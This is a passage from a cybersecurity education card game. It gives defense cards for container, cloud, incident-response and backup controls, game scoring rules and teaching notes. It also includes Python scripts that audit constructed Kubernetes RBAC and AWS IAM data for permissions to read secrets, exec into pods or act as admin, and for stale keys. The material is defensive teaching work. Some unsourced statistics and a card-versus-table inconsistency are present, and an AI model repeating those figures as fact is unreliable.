┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ CONTAINER IMAGE SCANNING            │
│ (BASIC - 10 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Scan all container images before    │
│ deployment for known vulnerabilities│
│ and malicious packages. Integrate   │
│ scanning into CI/CD pipeline.       │
│ Block images with critical CVEs     │
│ from being deployed.                │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Prevents deployment of vulnerable   │
│ containers. Catches:                │
│ - Old base images with known CVEs   │
│ - Malicious packages in dependencies│
│ - Secrets accidentally baked into   │
│ images                              │
│ Works best when combined with       │
│ runtime monitoring.                 │
│                                     │
│ LIMITATION: Only catches known      │
│ vulnerabilities (CVE databases).    │
└─────────────────────────────────────┘

Card D-32: Container Runtime Protection (Advanced)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ CONTAINER RUNTIME PROTECTION        │
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy runtime security monitoring  │
│ that enforces security policies on  │
│ running containers. Monitor syscalls│
│ (system calls), network connections,│
│ and file access. Enforce AppArmor   │
│ or SELinux profiles.                │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Detects and blocks:                 │
│ - Container escape attempts         │
│ - Lateral movement between containers│
│ - Privilege escalation in container │
│ - Anomalous process execution       │
│ - Unexpected network connections    │
│ Works against both known and unknown│
│ attacks (zero-day exploits).        │
│                                     │
│ REQUIREMENT: Requires kernel-level  │
│ instrumentation; varies by platform.│
└─────────────────────────────────────┘

Card D-33: Kubernetes Network Policy & RBAC (ELITE)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ KUBERNETES NETWORK POLICY & RBAC    │
│ (ELITE - 25 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: NETWORK             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Implement Kubernetes network policies│
│ to restrict container-to-container  │
│ communication. Deploy role-based     │
│ access control (RBAC) for API access│
│ and service accounts. Enforce Pod   │
│ Security Standards through admission│
│ control (PodSecurityPolicy was      │
│ removed in Kubernetes 1.25).        │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Implements micro-segmentation in    │
│ containerized environments. Prevents:│
│ - Lateral movement between pods     │
│ - Container escape attacks accessing │
│  host network                       │
│ - Privilege escalation via RBAC     │
│ - Unauthorized Kubernetes API access│
│                                     │
│ COMPLEXITY: Requires mature         │
│ Kubernetes operations and expertise. │
└─────────────────────────────────────┘
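Two of the checks behind this card can be run against exported cluster objects without any cluster access. The block below is an added Python example, not RetroVerse material: it reports namespaces that have no default-deny ingress NetworkPolicy, and service accounts bound to roles that can read secrets, exec into pods, grant further RBAC, or that are bound straight to cluster-admin. The objects are constructed to mirror the shape of `kubectl get ... -o json` output and do not come from a real cluster.

```python
"""Audit constructed Kubernetes objects for the gaps D-33 targets: namespaces
with no default-deny ingress policy, and service accounts bound to roles that
can read secrets, exec into pods, or grant themselves more RBAC.
Added example; the objects are constructed in kubectl JSON shape."""

def is_default_deny_ingress(np: dict) -> bool:
    """An empty podSelector selects every pod; 'Ingress' in policyTypes with
    no ingress rules means no ingress is allowed to any of them."""
    spec = np["spec"]
    return (spec.get("podSelector", {}) == {}
            and "Ingress" in spec.get("policyTypes", [])
            and not spec.get("ingress"))

def namespaces_without_default_deny(namespaces, netpols) -> list:
    covered = {np["metadata"]["namespace"]
               for np in netpols if is_default_deny_ingress(np)}
    return sorted(set(namespaces) - covered)

def dangerous_rule(rule: dict) -> list:
    """Reasons a single RBAC rule is risky for a workload identity."""
    verbs = set(rule.get("verbs", []))
    resources = set(rule.get("resources", []))
    groups = set(rule.get("apiGroups", []))
    reasons = []
    if "*" in verbs and "*" in resources and "*" in groups:
        reasons.append("wildcard verbs on all resources")
    if "secrets" in resources and verbs & {"get", "list", "watch", "*"}:
        reasons.append("can read secrets")
    if "pods/exec" in resources and verbs & {"create", "*"}:
        reasons.append("can exec into pods")
    if resources & {"rolebindings", "clusterrolebindings"} and verbs & {"create", "*"}:
        reasons.append("can grant additional RBAC")
    return reasons

def risky_service_accounts(roles: dict, bindings: list) -> dict:
    """roles maps (kind, name) -> Role/ClusterRole object. Returns
    'namespace/serviceaccount' -> reasons for every risky binding."""
    out = {}
    for b in bindings:
        ref = b["roleRef"]
        reasons = []
        if ref["kind"] == "ClusterRole" and ref["name"] == "cluster-admin":
            reasons.append("bound to cluster-admin")
        for rule in roles.get((ref["kind"], ref["name"]), {}).get("rules", []):
            reasons += dangerous_rule(rule)
        if not reasons:
            continue
        for s in b.get("subjects", []):
            if s.get("kind") == "ServiceAccount":
                # A RoleBinding subject defaults to the binding's namespace.
                ns = s.get("namespace", b["metadata"].get("namespace", "?"))
                out.setdefault(f"{ns}/{s['name']}", []).extend(reasons)
    return out

# Constructed cluster state.
NAMESPACES = ["default", "payments", "monitoring"]
NETPOLS = [
    {"metadata": {"name": "default-deny-ingress", "namespace": "payments"},
     "spec": {"podSelector": {}, "policyTypes": ["Ingress"]}},
    {"metadata": {"name": "allow-scrape", "namespace": "monitoring"},
     "spec": {"podSelector": {"matchLabels": {"app": "prometheus"}},
              "policyTypes": ["Ingress"],
              "ingress": [{"from": [{"podSelector": {"matchLabels": {"app": "grafana"}}}]}]}},
]
ROLES = {
    ("ClusterRole", "secret-reader"): {"rules": [
        {"apiGroups": [""], "resources": ["secrets"], "verbs": ["get", "list"]}]},
    ("Role", "config-reader"): {"rules": [
        {"apiGroups": [""], "resources": ["configmaps"], "verbs": ["get", "list", "watch"]}]},
}
BINDINGS = [
    {"metadata": {"name": "batch-secrets"},
     "roleRef": {"kind": "ClusterRole", "name": "secret-reader"},
     "subjects": [{"kind": "ServiceAccount", "name": "batch-job", "namespace": "payments"}]},
    {"metadata": {"name": "web-config", "namespace": "default"},
     "roleRef": {"kind": "Role", "name": "config-reader"},
     "subjects": [{"kind": "ServiceAccount", "name": "web"}]},
    {"metadata": {"name": "ci-admin"},
     "roleRef": {"kind": "ClusterRole", "name": "cluster-admin"},
     "subjects": [{"kind": "ServiceAccount", "name": "ci-runner", "namespace": "kube-system"}]},
]

if __name__ == "__main__":
    print("no default-deny ingress:", namespaces_without_default_deny(NAMESPACES, NETPOLS))
    for sa, reasons in risky_service_accounts(ROLES, BINDINGS).items():
        print(sa, "->", "; ".join(reasons))
```

A namespace with no default-deny policy is flat by default, which is exactly the lateral-movement condition the card's "micro-segmentation" is meant to remove; the RBAC half matters because a service account token is what an attacker holds after a container compromise, and a secrets-reading binding turns one pod into every credential in the namespace.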

Cloud Security Posture Management (CSPM)

Card D-34: Cloud Configuration Auditing (Basic)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ CLOUD CONFIGURATION AUDITING        │
│ (BASIC - 10 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: CREDENTIAL ABUSE    │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy continuous cloud configuration│
│ monitoring (AWS Config, Azure       │
│ Policy, GCP Cloud Asset Inventory). │
│ Scan for misconfigured resources:   │
│ - Public S3 buckets                 │
│ - Overly permissive IAM policies    │
│ - Unencrypted databases             │
│ - Open security groups              │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Detects misconfigurations that allow│
│ unauthorized access:                │
│ - Public database access            │
│ - Exposed credentials in configs    │
│ - Overly broad IAM permissions      │
│ - Disabled encryption/logging       │
│ Alert on drift from secure baseline.│
│                                     │
│ LIMITATION: Only catches known      │
│ misconfiguration patterns.          │
└─────────────────────────────────────┘

Card D-35: Cloud Access & Permission Auditing (Advanced)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ CLOUD ACCESS & PERMISSION AUDITING  │
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasure: CREDENTIAL ABUSE    │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Audit all IAM roles, service        │
│ accounts, and API credentials for   │
│ over-privilege. Implement least-    │
│ privilege access. Regularly review  │
│ who has what permissions. Detect    │
│ and revoke unused credentials.      │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Prevents attackers from leveraging: │
│ - Exposed API keys with broad       │
│  permissions                        │
│ - Service accounts with admin access│
│ - Stale credentials from departed   │
│  employees                          │
│ - Cross-account trust abuse         │
│ Reduces blast radius if credentials │
│ are compromised.                    │
│                                     │
│ REQUIRES: Strong governance process │
│ to maintain least-privilege state.  │
└─────────────────────────────────────┘
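Here is what the audit on this card looks like as code. It is an added Python example written for this page, not RetroVerse material and not the AWS API: it walks constructed IAM policy documents and access-key metadata (shaped like the output of the IAM ListPolicies and access-key last-used calls) and reports admin-equivalent and privilege-escalation grants, service-wide wildcards, and active keys unused beyond a threshold. The policies, the key records, the fixed "now" and the 90-day threshold are all assumptions.

```python
"""Audit constructed IAM data for the conditions D-35 lists: wildcard
policies, admin-equivalent service identities, and access keys unused past
a threshold. Added example; the policy documents, key metadata, the fixed
clock and the 90-day threshold are all constructed assumptions."""
from datetime import datetime, timedelta, timezone

NOW = datetime(2024, 7, 2, tzinfo=timezone.utc)   # fixed for reproducible output
STALE_AFTER = timedelta(days=90)

def as_list(v):
    """IAM allows a single string or a list in Statement/Action/Resource."""
    return v if isinstance(v, list) else [v]

def policy_findings(policy: dict) -> list:
    """Flag Allow statements that grant everything on everything, IAM
    write/PassRole on all resources, or a whole service on all resources."""
    findings = []
    for st in as_list(policy["Statement"]):
        if st.get("Effect") != "Allow":
            continue
        actions = [a.lower() for a in as_list(st.get("Action", []))]
        resources = as_list(st.get("Resource", []))
        if "*" in actions and "*" in resources:
            findings.append("Action:* on Resource:* (admin-equivalent)")
        elif any(a in ("iam:*", "iam:passrole") for a in actions) and "*" in resources:
            findings.append("IAM write/PassRole on all resources (privilege escalation path)")
        elif any(a.endswith(":*") for a in actions) and "*" in resources:
            svcs = sorted({a.split(":")[0] for a in actions if a.endswith(":*")})
            findings.append(f"service-wide wildcard on all resources: {', '.join(svcs)}")
    return findings

def key_findings(keys: list) -> list:
    """Flag active keys never used, or not used within STALE_AFTER."""
    findings = []
    for k in keys:
        if k["Status"] != "Active":
            continue
        last = k.get("LastUsedDate")
        if last is None:
            findings.append(f"{k['AccessKeyId']} ({k['UserName']}): active, never used")
        elif NOW - last > STALE_AFTER:
            findings.append(f"{k['AccessKeyId']} ({k['UserName']}): unused for {(NOW - last).days} days")
    return findings

def audit(principals: dict, keys: list) -> dict:
    report = {}
    for name, policy in principals.items():
        f = policy_findings(policy)
        if f:
            report[name] = f
    stale = key_findings(keys)
    if stale:
        report["stale-keys"] = stale
    return report

# Constructed policies attached to four principals, and four access keys.
SAMPLE_POLICIES = {
    "ci-deploy-role": {"Version": "2012-10-17", "Statement": [
        {"Effect": "Allow", "Action": "*", "Resource": "*"}]},
    "backup-svc": {"Version": "2012-10-17", "Statement": [
        {"Effect": "Allow", "Action": ["s3:*", "ec2:*"], "Resource": "*"}]},
    "app-reader": {"Version": "2012-10-17", "Statement": [
        {"Effect": "Allow", "Action": ["s3:GetObject"],
         "Resource": "arn:aws:s3:::app-assets-example/*"}]},
    "ops-admin": {"Version": "2012-10-17", "Statement":
        {"Effect": "Allow", "Action": ["iam:PassRole", "sts:AssumeRole"], "Resource": "*"}},
}
SAMPLE_KEYS = [
    {"UserName": "jdoe", "AccessKeyId": "AKIAEXAMPLE000001", "Status": "Active",
     "LastUsedDate": datetime(2024, 1, 10, tzinfo=timezone.utc)},
    {"UserName": "ops-bot", "AccessKeyId": "AKIAEXAMPLE000002", "Status": "Active",
     "LastUsedDate": datetime(2024, 7, 1, tzinfo=timezone.utc)},
    {"UserName": "intern", "AccessKeyId": "AKIAEXAMPLE000003", "Status": "Active",
     "LastUsedDate": None},
    {"UserName": "old-svc", "AccessKeyId": "AKIAEXAMPLE000004", "Status": "Inactive",
     "LastUsedDate": None},
]

if __name__ == "__main__":
    for name, findings in audit(SAMPLE_POLICIES, SAMPLE_KEYS).items():
        print(name)
        for f in findings:
            print("  -", f)
```

The stale-key check is the one that would have closed the T-18 scenario: a key unused for months that suddenly becomes active is both an audit finding and an alert condition, and a key that is still Active six months after its owner left is an offboarding failure before it is anything else.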

Card D-36: Cloud Compliance & Audit Trail (ELITE)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ CLOUD COMPLIANCE & AUDIT TRAIL      │
│ (ELITE - 25 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: DATA EXFIL          │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Enable comprehensive cloud audit    │
│ logging (AWS CloudTrail, Google     │
│ Cloud Audit Logs, Azure Activity    │
│ Log). Forward all logs to           │
│ immutable, centralized storage.     │
│ Monitor for unauthorized API calls, │
│ data access, and resource changes.  │
│ Protect the log bucket with Object  │
│ Lock or MFA Delete.                 │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Provides forensic trail for:        │
│ - Detecting API token abuse        │
│ - Investigating data exfiltration   │
│ - Compliance reporting              │
│ - Incident response timeline        │
│ Prevents attackers from covering    │
│ tracks (immutable logs). Enables    │
│ rapid investigation of cloud API    │
│ compromises.                        │
│                                     │
│ COST: High storage requirements.    │
└─────────────────────────────────────┘

Incident Response Playbooks

Card D-37: Playbook: Ransomware Response (Advanced)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ PLAYBOOK: RANSOMWARE RESPONSE       │
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Pre-built, tested ransomware response│
│ playbook covering:                  │
│ - Immediate network isolation steps │
│ - Communication procedures          │
│ - Forensic data collection          │
│ - Restoration procedures            │
│ - Stakeholder notifications         │
│ Train incident response team on     │
│ playbook annually.                  │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ During Phase 2 or when ransomware   │
│ is detected:                        │
│ Get +4 bonus to defense rolls when  │
│ responding to ransomware threats.   │
│ Reduces response time, limiting     │
│ damage.                             │
│                                     │
│ EDUCATIONAL VALUE: Teaches incident │
│ response process and coordination.  │
└─────────────────────────────────────┘

Card D-38: Playbook: Credential Compromise Response (Advanced)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ PLAYBOOK: CREDENTIAL COMPROMISE     │
│ RESPONSE                            │
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasure: CREDENTIAL ABUSE    │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Pre-built playbook for credential   │
│ compromise scenarios:               │
│ - Identify affected accounts        │
│ - Forced password reset procedures  │
│ - Session invalidation              │
│ - MFA re-enrollment process         │
│ - Forensic user activity review     │
│ - Privileged account audit          │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ When investigating compromised      │
│ credentials:                        │
│ Get +4 bonus to defense rolls.      │
│ Allows rapid containment before     │
│ lateral movement occurs.            │
│                                     │
│ EXAMPLE USE: During "Mimikatz       │
│ Credential Dumping" threat, playbook│
│ helps isolate affected accounts.    │
└─────────────────────────────────────┘

Card D-39: Playbook: Insider Threat Response (ELITE)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ PLAYBOOK: INSIDER THREAT RESPONSE   │
│ (ELITE - 25 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: DATA EXFIL          │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Comprehensive insider threat        │
│ response playbook including:        │
│ - HR coordination protocols         │
│ - Legal review and preservation     │
│ - Forensic evidence collection      │
│ - Physical security response        │
│ - System access removal procedures  │
│ - Communication to management       │
│ Requires cross-functional team      │
│ coordination.                       │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ When responding to insider threats: │
│ Get +5 bonus to defense rolls.      │
│ Requires strong organizational      │
│ processes to be effective.          │
│                                     │
│ EXAMPLE USE: When "Malicious        │
│ Insider Data Theft" is detected,    │
│ playbook coordinates response across │
│ security, HR, legal, and executives.│
└─────────────────────────────────────┘

Card D-40: Playbook: Supply Chain Breach Response (ELITE)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ PLAYBOOK: SUPPLY CHAIN BREACH       │
│ RESPONSE                            │
│ (ELITE - 25 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Specialized playbook for supply     │
│ chain compromises:                  │
│ - Vendor notification procedures    │
│ - Industry coordination             │
│ - Affected system inventory         │
│ - Patch deployment prioritization   │
│ - Third-party impact assessment     │
│ - Public communication strategy     │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ During Phase 2 when defending       │
│ against supply chain attacks:       │
│ Get +5 bonus to defense rolls.      │
│ Requires vendor relationships and   │
│ industry collaboration.             │
│                                     │
│ LEARNING: Teaches that supply chain │
│ incidents require industry response.│
└─────────────────────────────────────┘

Backup & Disaster Recovery

Card D-41: Backup Strategy - 3-2-1 Rule (Basic)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ BACKUP STRATEGY - 3-2-1 RULE        │
│ (BASIC - 10 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Implement the 3-2-1 backup rule:    │
│ - 3 copies of data                  │
│ - 2 different media types           │
│ - 1 copy offline/offsite            │
│ Regular backup verification testing.│
│ Document retention and recovery     │
│ RPO/RTO (Recovery Point/Time        │
│ Objectives).                        │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ If ransomware encrypts data:        │
│ Recovery becomes possible without   │
│ paying ransom. Offline backups      │
│ ensure attacker cannot delete them. │
│ Reduces ransomware attack impact    │
│ significantly.                      │
│                                     │
│ LIMITATION: Only effective if       │
│ backups are regularly tested and    │
│ truly offline.                      │
└─────────────────────────────────────┘

Card D-42: Immutable Backup Storage (Advanced)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ IMMUTABLE BACKUP STORAGE            │
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy backup storage with WORM     │
│ (Write-Once-Read-Many) protection.  │
│ Once backups are written, they      │
│ cannot be modified or deleted,      │
│ even by administrators. Implement   │
│ MFA Delete on storage. Use an       │
│ air-gapped backup network.          │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Even if attacker gains admin access │
│ or compromises backup system:       │
│ Backups remain protected and        │
│ unmodifiable. Enables guaranteed    │
│ recovery. Works against double-     │
│ extortion ransomware attacks.       │
│                                     │
│ COST: Higher storage cost for       │
│ immutable solutions.                │
└─────────────────────────────────────┘

Card D-43: Disaster Recovery Plan & Testing (ELITE)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ DISASTER RECOVERY PLAN & TESTING    │
│ (ELITE - 25 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Establish comprehensive disaster    │
│ recovery plan (DRP) including:      │
│ - Failover procedures               │
│ - Alternate site readiness          │
│ - Recovery procedures (step-by-step)│
│ - Communication protocols           │
│ - Key personnel contacts            │
│ Conduct quarterly DRP drills and    │
│ recovery testing.                   │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ During ransomware or supply chain   │
│ attacks:                            │
│ Get +3 bonus to all defense rolls   │
│ after initial containment. Enables  │
│ business continuity.                │
│                                     │
│ EDUCATIONAL VALUE: Teaches business │
│ continuity planning and resilience. │
└─────────────────────────────────────┘

Defense Card Integration Guide

By Threat Type Mapping

Against Supply Chain Attacks (T-13, T-14):
- D-31: Container Image Scanning
- D-29: Process Behavior Analysis (catches apps compromised by supply chain attacks)
- D-40: Playbook: Supply Chain Breach Response

Against Insider Threats (T-15, T-16):
- D-28: Baseline Behavior Learning System
- D-29: Process Behavior Analysis
- D-39: Playbook: Insider Threat Response

Against IoT Compromise (T-17):
- D-25: Application Whitelisting
- D-31: Container Image Scanning (if containerized)
- D-28: Baseline Behavior Learning System

Against Cloud API Abuse (T-18):
- D-34: Cloud Configuration Auditing
- D-35: Cloud Access & Permission Auditing
- D-36: Cloud Compliance & Audit Trail

Against DNS Tunneling (T-19):
- D-28: Baseline Behavior Learning System (network baseline)
- D-30: Machine Learning Anomaly Detection

Against Physical Security Bypass (T-20):
- D-28: Baseline Behavior Learning System (detection)
- D-38: Playbook: Credential Compromise Response

Against Ransomware (T-11, supply chain variants):
- D-41: Backup Strategy - 3-2-1 Rule
- D-42: Immutable Backup Storage
- D-43: Disaster Recovery Plan & Testing
- D-37: Playbook: Ransomware Response


Sample Defense Card Combinations

"Enterprise Ransomware Defense" (4 cards, 55 Budget)

"Cloud-Native Security" (4 cards, 75 Budget)

"Insider Threat Detection & Response" (4 cards, 75 Budget)

"Zero-Trust Architecture" (5 cards, 95 Budget)


Hardening Module with Expansion Defense Cards

Hardening Scenario: Enterprise Defense Build-Out (7 turns, v2.2)

Starting Budget: 150 | Turn Limit: 7 (one action per turn; up to 2 BASIC defenses may be deployed as one action)

Turn 1 (Foundation): D-34 Cloud Configuration Auditing (10) + D-25 Application Whitelisting (10) — Quick-Win pair → 20 spent
Turn 2 (Foundation): D-41 Backup Strategy - 3-2-1 Rule (10) + D-31 Container Image Scanning (10) — Quick-Win pair → 40 spent
Turn 3 (Advanced Layer): D-28 Baseline Behavior Learning System (15) → 55 spent
Turn 4 (Advanced Layer): D-32 Container Runtime Protection (15) → 70 spent
Turn 5 (Advanced Layer): D-35 Cloud Access & Permission Auditing (15) → 85 spent
Turn 6 (Preparation): Create MALWARE playbook (10) → 95 spent
Turn 7 (Expert Layer): D-36 Cloud Compliance & Audit Trail (25) → 120 spent, 30 remaining

Final Security Score Calculation (v2.2 formula):
- 8 defenses deployed × 5 = 40 points
- 0 hardening upgrades × 2 = 0 points
- 1 playbook × 10 = 10 points
- 3 of 4 pentester tactics defended × 5 = 15 points
- Budget efficiency: (30 / 150) × 10 = 2 points
- Total: 67 points (Strong defense-in-depth — Victory: score ≥ 60, ≥ 4 defenses, majority of tactics defended)


Pentester Tactic Card Interactions with Defense Cards (v2.2)

When a Pentester Tactic Card (PT-01 to PT-08, see ../../hardening/core-deck/pentester-tactic-cards.md) is drawn during a Hardening phase, these expansion defenses may be chosen as the single resolving defense. Use the bonus below as the chosen defense's printed bonus in the canonical formula (d20 + printed bonus + upgrades + playbook vs. the tactic's DC):

PT-01: Social Engineering - Pretexting (DC 12)

PT-02: Malware Evasion - Living-off-the-Land (DC 13)

PT-03: Credential Dumping - Mimikatz (DC 13)

PT-04: Lateral Movement - Network Traversal (DC 13)

PT-05: Privilege Escalation - Kernel Exploit (DC 14)

PT-06: Data Exfiltration - Unmonitored Channel (DC 14)

PT-07: Supply Chain Compromise - Trusted Update (DC 14)

PT-08: Insider Threat - Malicious Administrator (DC 15)


Teaching Notes for Defense Card Expansion

Application Whitelisting (D-25, D-26, D-27)

Why it matters:
- Stops 90%+ of malware variants if properly configured
- "Defense in depth" - cheap to start, expensive to perfect
- Trade-off: security vs. usability (users can't run unauthorized apps)

Real-world context:
- Used by government agencies and financial institutions
- Apple's approach (iOS/macOS sandboxing)
- Increasingly common in "zero trust" architectures

Discussion points:
- "What does a living-off-the-land blocker stop that regular whitelisting doesn't?"
- "Why is adoption slow despite effectiveness?"

Behavioral Analytics (D-28, D-29, D-30)

Why it matters:
- Catches attacks that don't match known signatures
- Foundation for modern threat detection
- Requires a "normal" baseline to be effective

Real-world context:
- Splunk, Elastic, Sentinel use behavioral analytics
- UEBA systems detect insider threats
- Process behavior monitoring by CrowdStrike (Falcon), Tanium

Discussion points:
- "What counts as 'abnormal' and who decides?"
- "How do you build a baseline without including attacks?"
- "Why can't signature-based antivirus do this?"

Container Security (D-31, D-32, D-33)

Why it matters:
- Container environments have unique attack surfaces
- Rapid deployment means traditional approaches fail
- Network segmentation at container level is powerful

Real-world context:
- Kubernetes is now the standard container orchestrator
- Docker/container adoption is 90%+ in enterprises
- Container escape vulnerabilities (runc, containerd, etc.)

Discussion points:
- "How is container security different from VM security?"
- "Why is network policy critical in Kubernetes?"
- "What's an example of a container escape attack?"

Cloud Security Posture Management (D-34, D-35, D-36)

Why it matters:
- Cloud misconfigurations are a leading breach cause
- The shared responsibility model confuses organizations
- API-driven access requires different monitoring

Real-world context:
- Hundreds of millions exposed via public S3 buckets
- Capital One breach: misconfigured WAF
- Equifax: unpatched open-source component in cloud environment

Discussion points:
- "Who's responsible for cloud security: vendor or organization?"
- "How do you audit permissions when there are 1000s of IAM roles?"
- "Why is 'least privilege' hard to achieve in practice?"

Incident Response Playbooks (D-37, D-38, D-39, D-40)

Why it matters:
- Pre-planning reduces response time significantly
- Coordination across teams is critical
- Written procedures prevent panic decisions

Real-world context:
- Organizations without playbooks average 9+ month detection time
- With playbooks, average drops to 3-4 months
- Playbooks required by HIPAA, PCI-DSS, NIST frameworks

Discussion points:
- "Who should be involved in ransomware response?"
- "How do you balance forensics with business recovery?"
- "Why test playbooks if you hope to never use them?"

Backup & Disaster Recovery (D-41, D-42, D-43)

Why it matters:
- Ransomware made backups critical (not just compliance)
- Recovery is often the cheapest way to respond to attacks
- Immutable backups prevent attacker deletion

Real-world context:
- Many ransomware attacks double-extort (steal + encrypt)
- Immutable backups became critical after backup deletion attacks
- AWS S3, Azure Blob WORM protection adopted widely

Discussion points:
- "Can backups be targeted by attackers?"
- "What's the difference between backup and disaster recovery?"
- "Why would immutable backups be controversial?"


Expansion Defense Card Deck Summary

Card  Title                                       Tier      Budget  Countermeasure
D-25  Application Whitelisting                    BASIC     10      MALWARE
D-26  Advanced Application Control with AI        ADVANCED  15      MALWARE
D-27  Living-Off-The-Land Blocker                 ELITE     25      MALWARE
D-28  Baseline Behavior Learning System           ADVANCED  15      NETWORK
D-29  Process Behavior Analysis                   ADVANCED  15      MALWARE
D-30  Machine Learning Anomaly Detection          ELITE     25      MALWARE
D-31  Container Image Scanning                    BASIC     10      MALWARE
D-32  Container Runtime Protection                ADVANCED  15      MALWARE
D-33  Kubernetes Network Policy & RBAC            ELITE     25      NETWORK
D-34  Cloud Configuration Auditing                BASIC     10      CREDENTIAL ABUSE
D-35  Cloud Access & Permission Auditing          ADVANCED  15      CREDENTIAL ABUSE
D-36  Cloud Compliance & Audit Trail              ELITE     25      DATA EXFIL
D-37  Playbook: Ransomware Response               ADVANCED  15      MALWARE
D-38  Playbook: Credential Compromise Response    ADVANCED  15      CREDENTIAL ABUSE
D-39  Playbook: Insider Threat Response           ELITE     25      DATA EXFIL
D-40  Playbook: Supply Chain Breach Response      ELITE     25      WEB EXPLOIT
D-41  Backup Strategy - 3-2-1 Rule                BASIC     10      MALWARE
D-42  Immutable Backup Storage                    ADVANCED  15      MALWARE
D-43  Disaster Recovery Plan & Testing            ELITE     25      MALWARE

Total Expansion Cards: 19 (D-25 to D-43)
Budget Range: 10 (BASIC) to 25 (ELITE)
Distribution: 4 BASIC (D-25, D-31, D-34, D-41), 8 ADVANCED (D-26, D-28, D-29, D-32, D-35, D-37, D-38, D-42), 7 ELITE (D-27, D-30, D-33, D-36, D-39, D-40, D-43)


Building Custom Scenarios with Expansion Cards

Template: "Expert Level Scenario"

Setup:
- 5-card threat chain (mix of base + expansion threats)
- Starting Budget: 120
- Turn Limit: 11 [(5 × 2) + 1, per core rules §3a]

Incident Response Attack Chain Example:
  1. Compromised Software Vendor Update (T-13) → MALWARE
  2. Lateral Movement via SMB (T-04) → NETWORK
  3. Cloud API Token Theft (T-18) → CREDENTIAL ABUSE
  4. Disgruntled Employee Sabotage (T-16) → MALWARE
  5. Data Exfiltration (T-19: DNS Tunneling) → DATA EXFIL

Incident Response Recommended Defense Starting Hand:
- D-31: Container Image Scanning (10)
- D-28: Baseline Behavior Learning System (15)
- D-34: Cloud Configuration Auditing (10)
- D-35: Cloud Access & Permission Auditing (15)
- D-37: Playbook: Ransomware Response (15) - reusable

Hardening Strategy:
- Deploy D-32, D-33 for container security
- Deploy D-36 for cloud audit trails
- Deploy D-30 for insider threat detection
- Prepare D-39 playbook for insider coordination

Pentester Tactics to Draw (Hardening):
  1. PT-07: Supply Chain Compromise (countered by D-31, D-40)
  2. PT-02: Malware Evasion - Living-off-the-Land (countered by D-27, D-30)
  3. PT-09: Multi-Vector Attack, expansion (countered by D-33, D-35)


Printable Card Layout

Print Instructions

  1. Print on cardstock (250 gsm minimum)
  2. Use different color for expansion deck (e.g., teal background vs. white)
  3. Cut along dotted lines
  4. Consider laminating or card sleeves
  5. Store in separate box from base deck

Color Coding Suggestions


Recommended Deck Combinations

Complete Game with All Cards

Recommended Play: Use subsets based on experience level
- Beginners: Base deck only
- Intermediate: Base + 4 expansion threats (choose scenario)
- Advanced: Base + all expansion cards


Quick Integration Checklist


Expansion Defense Card Set for Incident Zero
Use these cards to add modern security controls to your game
For integration guides and teaching notes, see above sections

cards/print-templates/tracker-sheets.md

Tracker Sheets (Print & Play)

Version: 2.2 - Playtest Edition

Print on plain A4. One Universal Sheet per table, plus the module sheet for the module you're playing. Tip: laminate and use a dry-erase marker, or move a coin/token along the tracks.


Universal Tracker Sheet (all modules)

Turn Track

